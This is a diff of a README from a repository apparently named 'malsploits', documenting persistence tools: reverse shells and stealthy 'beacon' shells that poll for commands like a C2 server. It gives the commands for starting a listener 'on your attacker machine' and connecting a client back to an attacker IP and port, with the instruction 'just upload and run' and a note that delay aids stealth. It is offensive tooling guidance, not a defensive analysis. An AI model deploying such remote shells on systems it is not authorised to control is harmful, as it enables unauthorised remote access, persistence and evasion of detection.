tiredperson47/malsploits/persistence/README.md

 I also suggest using the `rlwrap` tool when executing the client.
 This tool allows you to scroll through previous commands and use arrow keys to edit your commands.

 ## Reverse Shells
-The `port` and `IP address` is statically set within the client.
-You can change it by editing the `PORT` and `ip_addr` variables.
+Works like a standard reverse shell payload.
+Just upload and run.
+The server is the listener, so it's executed on your attacker machine.
 ```
 rlwrap ./server <PORT>

 ./client <IP> <PORT>
 ```
-I also suggest using the `rlwrap` tool when executing the client.
-This tool allows you to scroll through previous commands and use arrow keys to edit your commands.

 ## Beacon Shells
-These are basically reverse shells except they have a delay in which they grab commands.
+These are basically reverse shells except they have a delay in which they grab commands and you can execute binaries as you would in a C2 server.
 This can be helpful in stealth.
 HTTP based beacon shells may come in the future!
 ```
 rlwrap ./server <PORT>